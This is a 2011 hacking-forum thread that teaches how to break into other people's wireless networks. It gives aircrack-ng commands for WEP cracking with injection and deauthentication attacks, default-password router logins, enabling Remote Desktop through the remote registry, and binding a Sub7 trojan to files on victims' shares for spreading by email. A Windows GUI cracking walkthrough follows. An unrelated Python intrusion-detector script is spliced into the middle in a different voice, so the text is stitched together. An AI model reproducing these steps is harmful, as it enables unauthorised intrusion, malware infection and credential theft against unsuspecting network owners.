Wireless H@cking -- Part 1

Discussion in 'DELETED POSTS' started by ᶜᵃˡˡ ᵐᵉ Lord MeXz3, Aug 25, 2011.


    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    Here we will learn how to crack a WEP key and get into other wireless networks.

    There are two methods of H@cking: locally or globally. There is an infinite number of subsets to the following ideas, but let us cover as much as we can. The following is one part of several parts of the tutorial that will be posted later. Let us start off with the first scenario.

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Local H@cking


    This method normally consists of gaining access one way or another via the intranet. Let us test the following method. (Note: everything highlighted in YELLOW is code, what you type in the terminal.)

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Wireless H@cking

    Let us set up a scenario here. You are eager to gain access to a non-specific (or specific, if you have an apparent grudge against a mean neighbor) local computer. Here are the tools needed to gain access before we go on our mission.

        * Laptop with dual boot (preferably BackTrack 2 for Linux, and the second boot being Windows XP Pro)
        * A CD
        * DeepBurner, so you can burn your .ISO image to your CD.
        * Supported wireless card for injection to work properly (please see the list found here: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#which_is_the_best_card_to_buy)
        * Enough battery life to serve you well
        * Kismet or NetStumbler (to each his own; preferably Kismet for Linux so you do not have to reboot back and forth so often; this comes complete in BackTrack 2)

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Part 1

    Gathering your materials

    1. Download the BackTrack 2 Final ISO image from:
    http://remote-exploit.org/backtrack_download.html
    2. Download DeepBurner and install it: http://www.deepburner.com/?r=download
    3. Start up DeepBurner and select "Burn ISO image file". Then find your file and click Burn.

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Part 2

    Beginning the project at hand

    1. Start up your laptop into BackTrack 2. To do so, place the CD into the computer, turn it on, and select boot from CD (this varies from laptop to laptop; it may have the option to hit a function key such as F10 to select the boot device).

    [IMG]

    [IMG]

    2. BT2 will ask you to put in your username and password: root/toor
    3. Now, type in startx
    4. Once the OS is loaded, click on the black box on the bottom left-hand side; this is your shell.

    5. Type in kismet and hit enter.

    6. Kismet will eventually load and pull up a fairly primitive color GUI within the shell that shows all access points within your designated area, constantly being updated.

    7. After selecting your target, find out via Kismet whether it is WEP, WPA, etc. Preferably WEP, 64- or 128-bit. It tells you in a sorted column on the right-hand side.

    8. Now, the fun begins. Open up a few tabs within the shell, and type each line in a new tab. Everything within the parentheses is an explanation of what it means, syntax, etc.


    9. iwconfig wlan0 mode monitor (This places the wi-fi card in monitor mode; Syntax: iwconfig device_name_here mode command_monitor)

    10. airodump-ng --ivs --write file_name --channel 11 wlan0 (Starts the monitoring, collects weak IV packets. Syntax: airodump-ng –ivs_creates_extension_type –-write any_given_filename_here –channel this specifies any specific channel you wish to listen to, so you can filter out any unnecessary data).

    11. aireplay-ng -3 -b 00:16:B6:2E:C3:4E -h 00:14:A5:8A:02:CD wlan0 (Stimulates packets; injection. Syntax: aireplay-ng -3 attack level -b BSSID of router goes here, shown by kismet -h the attached computer to the bssid; the router wlan0=device that you are using, remains consistent).

    12. aireplay-ng -0 wlan0 -a 00:16:B6:2E:C3:4E wlan0 (This is the deauthentication attack. Aireplay-ng -0 attack number wlan0 device type of yours -a BSSID goes here again wlan0 repeat your device here, yet again).

    13. Now, watch the magic happen. To put it in layman's terms, MANY numbers will appear to be rapidly increasing. Within the airodump-ng tab you had opened, the SSID of the attacked victim will increase quite a bit. Look under the IVS column to view how many you have saved to the file. Let's from now on call this the default victim SSID. Once the number hits 250,000 (if it is 64-bit encryption) or 1,000,000 for 128-bit, you will be able to execute your Cr@cking method on the IVS file you have been continuously writing.

    14. Cr@cking time! cd to the directory where you have been saving the file. Then execute the following: aircrack-ng -0 -n 128 -f 4 file_name.ivs (Syntax: aircrack-ng -0 attack type -n number of the encryption type, 64 or 128 -fudgefactor 2-18 *.cap or *.ivs depending on what file type you decided to save your file as while gathering packets).

    15. After a minute or two (possibly less) you will have your hexadecimal password, so now you can connect to your noob's, erm, I mean 'victim's' router.

    16. Reboot your computer after jotting down the hex code, and log into your winbox on the same laptop.

    17. I would now recommend setting up your 'anonymous tools.' I would suggest the following: download a program that IronGeek and I wrote that spoofs your MAC address and your NetBIOS name each time upon startup. It is entitled MadMacs and may be found at irongeek.com. Execute it, and reboot back into Windows.

    18. Connect to the SSID, and input the hex code twice WITHOUT THE COLONS as required.

    19. Hopefully, if you did not screw up, you will be connected.

    Stay tuned.....
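The defender's side of steps 11 and 12 above: the traffic they generate is loud on the air, which is why a wireless IDS such as Kismet can flag it. As an added example (my own code, not from this thread, from Kismet or from the aircrack-ng project), here is a small Python detector that raises an alert on a burst of deauthentication frames against one BSSID and on a burst of identically sized data frames replayed from one station at a high rate. The frame records, MAC addresses, window and thresholds are all constructed for the demonstration.

```python
from collections import defaultdict, deque

# Constructed sample identifiers (not from any real network).
SAMPLE_AP = "aa:bb:cc:00:00:01"
SAMPLE_CLIENT = "aa:bb:cc:00:00:02"
BROADCAST = "ff:ff:ff:ff:ff:ff"


# Each record: (timestamp_s, subtype, bssid, src, dst, frame_len), the per-frame
# fields a monitor-mode sniffer exposes.  Sample traffic is constructed here.
def build_sample_frames(include_attack=True):
    frames = []
    for i in range(300):                      # 30 s of beacons from the AP
        frames.append((i * 0.1, "beacon", SAMPLE_AP, SAMPLE_AP, BROADCAST, 120))
    for i in range(60):                       # ordinary client data of varying size
        frames.append((i * 0.5, "data", SAMPLE_AP, SAMPLE_CLIENT, SAMPLE_AP,
                       200 + (i % 7) * 50))
    if include_attack:
        for i in range(40):                   # deauth burst, AP address as sender
            frames.append((30.0 + i * 0.05, "deauth", SAMPLE_AP, SAMPLE_AP, BROADCAST, 26))
        for i in range(300):                  # same-length data frames at 100 frames/s
            frames.append((33.0 + i * 0.01, "data", SAMPLE_AP, SAMPLE_CLIENT, SAMPLE_AP, 68))
    return frames


def _push(window_q, ts, window_s):
    """Append ts, drop entries older than the sliding window, return the count."""
    window_q.append(ts)
    while ts - window_q[0] > window_s:
        window_q.popleft()
    return len(window_q)


def detect(frames, window_s=5.0, deauth_thr=10, replay_thr=100):
    """Return alerts for (a) deauth floods per BSSID and (b) bursts of identically
    sized data frames per (station, length).  Each alert is raised once per key."""
    alerts, raised = [], set()
    deauths = defaultdict(deque)   # bssid -> recent deauth timestamps
    bursts = defaultdict(deque)    # (src, frame_len) -> recent data timestamps
    for ts, subtype, bssid, src, _dst, frame_len in sorted(frames):
        if subtype == "deauth":
            n = _push(deauths[bssid], ts, window_s)
            if n >= deauth_thr and ("deauth", bssid) not in raised:
                raised.add(("deauth", bssid))
                alerts.append({"kind": "deauth_flood", "bssid": bssid,
                               "count": n, "at": ts})
        elif subtype == "data":
            key = (src, frame_len)
            n = _push(bursts[key], ts, window_s)
            if n >= replay_thr and ("replay", key) not in raised:
                raised.add(("replay", key))
                alerts.append({"kind": "replay_suspect", "station": src, "bssid": bssid,
                               "frame_len": frame_len, "count": n, "at": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect(build_sample_frames()):
        print(alert)
```

On a real capture the same logic would be fed from a monitor-mode interface; the thresholds here are illustrative and a production WIDS tunes them per site.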

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    [IMG]


    Kismet is a console-based 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing and can even decloak hidden networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps.

    Download here (Windows users):
    http://www.megaupload.com/?d=2RUEPAoB

    Download here (Linux users):
    http://www.megaupload.com/?d=ATRPIKOJ

    Slimderek Retired Moderator

    Lovely.....
    As soon as there's enough wireless in Benin...
    I'll fall back to this thread.

    Chilldelta GL Legend

    Link not available for Windows users.


    IFYEEZ GL Legend

    HMMMMMMMMMM, MAKING BRAIN, BUT I CAN'T USE IT

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    http://www.megaupload.com/?d=2RUEPA0B

    orchmansolo Member

    Please, my PC doesn't read empty discs.... I don't know what to do.

    bobsimon Member

    That's nice, but that's not what I am interested in. I'm looking for who to hack credit cards.

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    hmmm

    POSSIBLE GL Senior Member

    MEXZ3
    ... Thanks for this.
    Will get back as soon as this stuff dey GO. But it kinda long process o. 8)

    kombat Upcoming Guru

    Men, I only saw BT5, not BT2, and it's 1.9GB. I have downloaded 1.3GB. Where can I buy the software?

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    :D stay tuned for part 2

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    [IMG]

    Aircrack is a suite of tools for 802.11a/b/g WEP and WPA Cr@cking like AirSnort, but it is more efficient, as it can crack both WEP and WPA passwords. It can recover a 40- through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK Cr@cking), and airdecap (decrypts WEP/WPA capture files).

    Download here (Windows users):
    http://www.megaupload.com/?d=RFE87LXI

    Download here (Linux users):
    http://www.megaupload.com/?d=1XPDKFUK

    POSSIBLE GL Senior Member

    Can only this pave the way for a secure wireless connection?

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Part 2 – We have entered the building

    Now that we are connected, we may try a few methods of attack. Of course there are many, but allow me to test a few, and you may choose the one that best suits your situation. (Note: everything highlighted in yellow is code, what you type in the terminal.)

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Now that you are a part of the network by accessing the router, we may go back to the lovely command prompt, but this time within the Win32 environment. Open up the command prompt and type: ipconfig, so you can gain information about what the router gateway is and what IP you are automatically assigned (such as 192.168.1.XXX or 172.16.1.XXX. A simple rule of thumb is: if it is a 192 prefix, then the router address will most likely be 192.168.0.1, and for 172 it will be 172.16.0.1). So, write down the default gateway and paste it into your browser prefixed with http://. http://www.phenoelit.de/dpl/dpl.html lists all of the default usernames and passwords for each model number of router out there that may be purchased by the public. If all works accordingly, you will now be able to poke around with all of the glorious settings, such as opening the ports, which is the MOST important thing to hold onto. We will discuss this later.

    Let us poke around and try this method of attack. Go back to the command prompt and type: net view. This will display all computers connected on the network that you have so rudely joined. Now, we whip out our handy-dandy program called Nessus (or any OS fingerprinting tool that you may prefer, such as GDI, etc.). The point of this is to find out what OS is on each local intranet IP address. Now, as we all know, Windows XP Pro is the sweet OS. Why, you may ask? By default, XP Pro comes with Remote Registry enabled. I ask myself why every day, but why not profit from Microsoft's flaws. Also, no, you are correct, noobs do not disable this service. This may be time for you to turn off yours by going into services.msc. So, let us proceed while ignoring that last sidenote.

    Open up your registry editor, regedit. Click File > Connect Network Registry. (Please note that in certain scenarios you may not be able to connect to the remote registry if the person has a blank password. To test this theory, I hopped on a wi-fi network that I was indeed allowed to connect to, and tried to connect to a passwordless computer. Lo and behold, it worked, but not all of the registry keys showed up; enough to get yourself into trouble, though.) Follow the directions, click connect, etc. Now I know that you are thinking to yourself, we are riding on a lot of hope/faith here that everything the victim does fits our needs. Well, yeah, duh. :D This is why this is the 'non-preferred' method of choice. But it's the snowball's chance in hell, so 'never going to happen, you have to try it anyway' method. Let us proceed. Now, browse to HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server. Under the Terminal Server key, you'll find a REG_DWORD value named fDenyTSConnection. Double-click on that value to open the Edit DWORD Value box and change the value data from 1 (Remote Desktop disabled) to 0 (Remote Desktop enabled). To reboot the machine if you are impatient, go back to the command prompt shell and type: shutdown -m \\servername_or_ip_of_server_here -r. Ah, now wait for the glorious boot-up. If all goes accordingly, you will now be able to connect remotely to the noob's desktop and do whatever the hell you want.

    More plausible method

    Let's say you are currently connected locally to the same access point, and are eager to try another form of attack. Now, since we wish to have remote access, let us apply what we call a 'trojan.' A trojan gives you remote access from another place. There are a couple of ways of doing this. One, you can download a program called Sub7. This is a VERY well-known trojan. To get it, go to: http://www.hackpr.net/~sub7/ and follow the directions provided. Once you have created your server.exe (tweaked it, etc., and renamed it) we can proceed to our next step. Odds are, the noob has several victims on his network with open shares. These probably consist of .txt, .doc, .jpg, etc. files within the open shares. Usually they are accessed quite often, especially if the document is currently being edited. Your job (for once) is to google for what we may call an '.exe binder.' This is a beautiful tool indeed. It binds the server.exe that you have made and enables you to spoof it as the picture file or text document that the person has in their shares. Once you spoof this, the victim will eventually execute the file, plus the hidden file that you have stealthily implanted. I would suggest attaching this to as many files as possible found on each computer. This is probably the most direct approach. Remember when you assigned a port to the Sub7 server.exe? Well, this brings us back to the default gateway IP address that we cracked (accessed) earlier. Browse to the open port page and add the port you had assigned to server.exe. While you're at it, you can go to a remote place such as a library and send server.exe (preferably renamed for the following instances to game.exe, or patch.exe, setup.exe; you get the picture), or apply it to a .jpg as a picture of something random, to the e-mail address that you could have stealthily acquired while sniffing on the network that you had connected to, such as by getting a packet sniffer for Windows and waiting for anything that is sent out with an @. This could also be very useful to get passwords, usernames, and so on. Anyway, be creative in terms of getting the server file to some computer on that network. For the time being, go back home and leave your Sub7 client on, and it will notify you when it is executed. Thankfully, the programmers of Sub7 are quite brilliant and have the server.exe copied to some ambiguous directory without self-destructing, thus eliminating the idea that the file that 'does nothing' is a trojan. Eventually, the victim will connect, and you will have some fun from there.
    :D :D

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    [TUT] WEP Cr@cking IN WINDOWS [FULL GUI, WITH PICS]

    INTRODUCTION:
    Many Windows users here are struggling to hack WiFi networks because most of the tutorials are based on BackTrack and other Linux tools.

    I'm just sharing the method to crack WiFi networks using the WEP security protocol. WEP is very vulnerable to attacks and can be cracked easily.
    It takes about 5-6 hours if the password is weak and the signal of the WiFi network you are going to hack is strong, and sometimes 10-12 hours for more complicated passwords or if the WiFi signal of the network is weak.
    The time taken also changes if the WiFi network you are going to hack has many other clients already accessing it.


    You will be using two tools.

    1. CommView for WiFi:
    You will use this tool for capturing the packets sent and received through the Access Point you are going to hack.
    The more packets you capture, the better the chances of Cr@cking the password.
    You will need a minimum of 100,000 packets to crack the password.
    The packets will be captured in the .ncp format.
    You will use this tool to convert the .ncp to .cap.

    NOTE: Some WiFi cards are supported by CommView only in Windows 7, so I suggest you install Win 7 in your Virtual Machine if your card isn't supported.



    2. Aircrack-ng GUI:
    You will use this tool to crack the password of the Access Point using the .cap files you obtained from the CommView application.

    NOTE: You need to run this as administrator.

    I have provided links for both pieces of software below.


    Download Links:

    These are the links to the official websites of the tools.
    Some anti-viruses might detect Aircrack as a virus. It is a false positive.

    1. Aircrack-ng GUI

    Get it here: CLICK HERE

    2. CommView for WiFi

    Get it here: CLICK HERE

    GET READY TO CRACK:

    STEP 1:
    1. Install CommView for WiFi. It doesn't matter whether you install it in VoIP mode or Standard mode. I used VoIP.
    It automatically installs the necessary drivers. Allow it to install.

    NOTE: You will not be able to connect to any network using WiFi while using CommView.


    STEP 2:
    2. Click on Attach in the left first.

    [IMG: 1.png]

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    STEP 3 (Choosing the Network (a)):
    A new window should pop up now.
    Click on the START SCANNING button.

    [IMG: 2.png]

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    STEP 4 (Choosing the Network (b)):
    Click on the WiFi network you want to hack in the right column and click on CAPTURE.
    NOTE: This tutorial is only for WEP-protected networks.

    [IMG: 3.png]

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    STEP 5 (Capturing the Packets):
    The window should close now and you should see that CommView has started capturing packets.

    [IMG: 4.png]

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    STEP 6 (Saving the Packets):
    Now that the packets are getting captured, you need to save them.
    Click on Settings->Options->Memory Usage.
    Change Maximum Packets in buffer to 20000.

    [IMG: 5.png]

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Click on the LOGGING tab.
    Check AUTO-SAVING.
    Maximum Directory Size: 2000
    Average Log File Size: 20

    [IMG: 6.png]

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Now CommView will automatically start saving packets in the .ncp format at a size of 20MB each in the specified directory.

